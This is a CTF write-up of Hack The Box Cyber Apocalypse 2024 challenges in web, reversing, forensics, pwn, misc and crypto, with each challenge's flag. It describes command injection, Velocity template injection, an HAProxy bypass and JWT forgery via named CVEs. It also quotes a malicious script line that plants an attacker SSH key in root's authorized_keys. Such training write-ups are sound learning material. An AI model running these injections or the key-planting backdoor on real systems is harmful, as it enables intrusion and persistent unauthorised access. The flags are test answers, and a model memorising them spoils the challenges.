# Hackthebox CyberApocalypse 2024 CTF Writeup Hello everybody reading this :), This is a writeup on how we solved some of the challenges hosted in Hackthebox Cyber Apocalypse CTF 2024 with the theme "Hacker Royale". The categories are ranging from Web, Misc, Reverse Engineering, PWN, Forensics and Cryptography. *NOTE : The challenges were solved by me, and @alienX and the other's who were in the team :)* ## Web Challenges ### Flag Command (Very Easy - 300 points) #### Description  provided the challenge description above, I spawn the docker instance and start solving this challenge! #### Solution I open the app on the web and intercept the requests using burpsuite I was able to capture some interesting requests after playing around with the web by inputting the command "start"  From burpsuite I was able to retrieve an endpoint dumping all commands to be executed on `/api/options`  And as seen there is a command **Blip-blop, in a pickle with a hiccup! Shmiggity-shmack**, I proceed by sending that as a command and I received the response with the flag  FLAG : HTB{D3v3l0p3r_t00l5_4r3_b35t_wh4t_y0u_Th1nk??!} ### KORP Terminal (Very Easy - 300 points) #### Description  #### Solution I overthinked a bit on this one, but spawning the docker and launching it on web we are responded with a login page.  Using the credentials , `admin:password123` I was able to get the flag:  FLAG : HTB{t3rm1n4l_cr4ck1ng_sh3n4nig4n5} ### TimeKORP #### Description  #### Solution Provided with the source codes we are required to analyze the source code and get the flag from the web app. Opening the web app we first are responded with an output of time. and there is a button on top left saying `What's the date?`:  Clicking on that the URI changes a bit to something interesting:  Smells like command injection! Reviewing the source code I could see the vulnerable point is `?format=` and we can perform command injection:  Now we can easily escape this by running something such as `;' [command-here]'`  FLAG : HTB{t1m3_f0r_th3_ult1m4t3_pwn4g3} ### Labrynth Linguistic (Easy - 300 points) #### Description  This was an interesting challenge, as I faced a technology which is rarely seen in environments. First opening the web application I am visiting a site asking for input and has a weird text written below:  Providing a sample word, it gives a weird text as a response and that's voxalith the translated language. I head back to reviewing the source code:  Then I discovered something interesting as it renders my input now the template engine used is **Velocity** which is also vulnerable to SSTI in the case used as in the source code seen above. After reading multiple articles I came accross a working payload, running it I was able to get the flag:  FLAG : HTB{f13ry_t3mpl4t35_fr0m_th3_d3pth5!!} #### References [Apache Velocity Server Side Template Injection](https://iwconnect.com/apache-velocity-server-side-template-injection/) ### LockTalk (Medium - 300 points) #### Description  #### Solution Alright we are provided with a source code available for download, and spawning the instance runs the web app on a certain host. The web application is more of an API which does about 3 features:  Trying to generate a JWT Token gives us an unauthorized error:  Heading back to the source code to review what is going on, we can see that this route is available to guest user:  But what's making it say 403???? Well Reading the `haproxy.cfg` file we get our answers:  There are two ways to bypass this, the first way is by url encoding the path `/api/v1/get_ticket` and the second way is by exploiting **CVE-2023-45539**. Let's take a look on both ways. **URL ENCODING**  **CVE-2023-45539**  By adding the `#` at the end of our URI will bypass the haproxy configuration rule and provide us with the token. Now the token is using the algorithm `PS256`. After a few minutes of google-fu, there is a vulnerability of **CVE-2022-39227** which allows an attacker to forge claims from a pregenrated token using the exploit https://github.com/user0x1337/CVE-2022-39227 I was able to generate the token and use it to get the flag:  FLAG : HTB{h4Pr0Xy_n3v3r_D1s@pp01n4s} ## Reverse Engineering ### BoxCutter (Very Easy - 300 points) #### Description  #### Solution This was quick, less than a minute I had the flag. Downloading the binary I first try to trace every call as the binary is executed and I was able to get the flag from the output as I was analyzing:  FLAG : HTB{tr4c1ng_th3_c4ll5} ### PackedAway (Very Easy - 300 points) #### Description  #### Solution The name of the challenge itself hints us on how to solve it. First I try to check if the file is packed by checking for suspicious strings:  As seen above, the binary is packed using UPX I now proceed to decompress it so as I retrieve the original binary:  Using `rabin2` I was able to fetch all readable strings and among them was the flag:  FLAG : HTB{unp4ck3d_th3_s3cr3t_0f_th3_p455w0rd} ### LootStash (Very Easy - 300 points) #### Description  #### Solution Given that the flag is on the stack it was easy for me to actually get the flag after trying to fetch all readable string and grep the word "HTB" out of it:  FLAG : HTB{n33dl3_in_a_l00t_stack} ### Crushing (Easy - 300 points) #### Description  ## Forensics ### An Unusual Sighting (Very Easy - 300 points) #### Description  #### Solution start an instance and solve the interact with the docker instance to solve the challenge  ``` FLAG: HTB{B3sT_0f_luck_1n_th3_Fr4y!!} ``` ### Urgent (Very Easy - 300 points) #### Description  #### Solution Another forensic easy challenge lets lake it down easy forensic LOL After unziping the file found inside a file encoded with base64 ``` ┌──(alienx㉿alienX)-[~/Desktop/PPP/HTB-CTF/urgent] └─$ ls 'Urgent Faction Recruitment Opportunity - Join Forces Against KORP™ Tyranny.eml' forensics_urgent.zip ``` found this interesting encoded text  and decided to decode it using cyberchef as follows  And if u take a deep look u will see a javascript encoded text, i went direct and coped it and try to decode it again using cyberchef again and guess what b00m  ``` FLAG:HTB{4n0th3r_d4y_4n0th3r_ph1shi1ng_4tt3mpT} ``` ### It Has Begun #### Description  #### Solution it another easy challenge this one i solved it very fast course it was easy men, lets get the flag downloaded the file ``` ┌──(alienx㉿alienX)-[~/Desktop/PPP/HTB-CTF/begun] └─$ mv ~/Downloads/forensics_it_has_begun\(2\).zip . ┌──(alienx㉿alienX)-[~/Desktop/PPP/HTB-CTF/begun] └─$ unzip forensics_it_has_begun\(2\).zip Archive: forensics_it_has_begun(2).zip inflating: script.sh ``` we got a bash script, lets read it now  now i looked closed with the script and undertood what it does but within it there is some strange encoded string lets decode them now ``` echo "ssh-rsa AAAAB4NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D7s4J0L7XV2kep0rNzgY1S1IdE8HDAf7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR02c6DyIcDnX3QdlSmEqPqSNRQ/XDgM7qIB/VpYtAhK/7DoE8pqdoFNBU5+JlqeWYpsM$ +qkHugKA5U22wEGs8xG2XyyDtrBcw10xz+M7U8Vpt0tEadeV973tXNNNpUgYGIFEsrDEAjbMkEsUw+iQmXg37EusEFjCVjBySGH3F+EQtwin3YmxbB9HRMzOIzNnXwCFaYU5JjTNnzylUBp/XB6B user@tS_u0y_ll1w{BTH" >> /root/.ssh/authorized_keys ``` The user section was very strange for me 'tS_u0y_ll1w{BTH' i went and reverse it  ``` ┌──(alienx㉿alienX)-[~/Desktop/PPP/HTB-CTF] └─$ flag: HTB{w1ll_y0u_St4nd_y0uR_Gr0uNd!!} ``` ## PWN ### Tutorial #### Description  #### Solution lets interact with an instance we have here via netcat command from our terminal.  The idea about this challenge was interge overflow, we were give a sample binary written in C language so as we can see how we can answer the docker instance direct, lets not waste time with this challenge.  ``` flag:HTB{gg_3z_th4nk5_f0r_th3_tut0r14l} reference:https://en.wikipedia.org/wiki/Integer_overflow reference:https://www.welivesecurity.com/2022/02/21/integer-overflow-how-it-occur-can-be-prevented/ ``` ## MISC ### Character (Very Easy - 300 points) #### Description  #### Solution as usually, spawn the docker instance, after starting it we are give a port and ip address lets create via terminal now. command: nc 94.237.54.161 47922 And as you can see below that we have been give a instance that once we input the index it give out the characters of the flag as all we know that the flag starts with HTB{} ``` ┌──(alienx㉿alienX)-[~/Desktop/PPP/HTB-CTF] └─$ nc 94.237.54.161 47922 Which character (index) of the flag do you want? Enter an index: 0 Character at Index 0: H Which character (index) of the flag do you want? Enter an index: 1 Character at Index 1: T Which character (index) of the flag do you want? Enter an index: 2 Character at Index 2: B Which character (index) of the flag do you want? Enter an index: 3 Character at Index 3: { Which character (index) of the flag do you want? Enter an index: Character at Index 97: l Which character (index) of the flag do you want? Enter an index: 98 Character at Index 98: 0 Which character (index) of the flag do you want? Enter an index: 99 Character at Index 99: n Which character (index) of the flag do you want? Enter an index: 10 Character at Index 10: s Which character (index) of the flag do you want? Enter an index: 100 Character at Index 100: g Which character (index) of the flag do you want? Enter an index: 101 Character at Index 101: ! Which character (index) of the flag do you want? Enter an index: 102 Character at Index 102: ! Which character (index) of the flag do you want? Enter an index: 103 Character at Index 103: } Which character (index) of the flag do you want? Enter an index: ``` if you continue u will notce that the flag is very long so i did this manually at first where u can just write the script to automate this by grepping after every index the flag characters TOTAL NUMBER OF CHARACTERS (0-104) ``` flag: HTB{tH15_1s_4_r3aLly_l0nG_fL4g_i_h0p3_f0r_y0Ur_s4k3_tH4t_y0U_sCr1pTEd_tH1s_oR_els3_iT_t0oK_qU1t3_l0ng!!} ``` ## CRYPTGRAPHY ### makeshif #### Description  #### Solution its another easy challenge from cryptography lets download the file first and see what we can do here. ``` ┌──(alienx㉿alienX)-[~/Desktop/PPP/HTB-CTF/make] └─$ unzip crypto_makeshift.zip Archive: crypto_makeshift.zip creating: challenge/ inflating: challenge/source.py extracting: challenge/output.txt ┌──(alienx㉿alienX)-[~/Desktop/PPP/HTB-CTF/make] └─$ cd challenge ┌──(alienx㉿alienX)-[~/…/PPP/HTB-CTF/make/challenge] └─$ ls output.txt source.py ┌──(alienx㉿alienX)-[~/…/PPP/HTB-CTF/make/challenge] └─$ cat output.txt !?}De!e3d_5n_nipaOw_3eTR3bt4{_THB ┌──(alienx㉿alienX)-[~/…/PPP/HTB-CTF/make/challenge] └─$ cat source.py from secret import FLAG flag = FLAG[::-1] new_flag = '' for i in range(0, len(flag), 3): new_flag += flag[i+1] new_flag += flag[i+2] new_flag += flag[i] print(new_flag) ``` we have been given a reversed cipher so we need to recover it, it very easy course we can use the source code being given to recover the flag like this first of all am going to edit the source file coz its not possible to run with the imported 'secret' coz its now not available ``` ┌──(alienx㉿alienX)-[~/…/PPP/HTB-CTF/make/challenge] └─$ nano source.py ┌──(alienx㉿alienX)-[~/…/PPP/HTB-CTF/make/challenge] └─$ cat source.py FLAG = "!?}De!e3d_5n_nipaOw_3eTR3bt4{_THB" flag = FLAG[::-1] new_flag = '' for i in range(0, len(flag), 3): new_flag += flag[i+1] new_flag += flag[i+2] new_flag += flag[i] print(new_flag) ┌──(alienx㉿alienX)-[~/…/PPP/HTB-CTF/make/challenge] └─$ python3 source.py HTB{4_b3tTeR_w3apOn_i5_n3edeD!?!} ``` ### Dynastic #### Description  #### Solution FLAG ``` HTB{DID_YOU_KNOW_ABOUT_THE_TRITHEMIUS_CIPHER?!_IT_IS_SIMILAR_TO_CAESAR_CIPHER} ```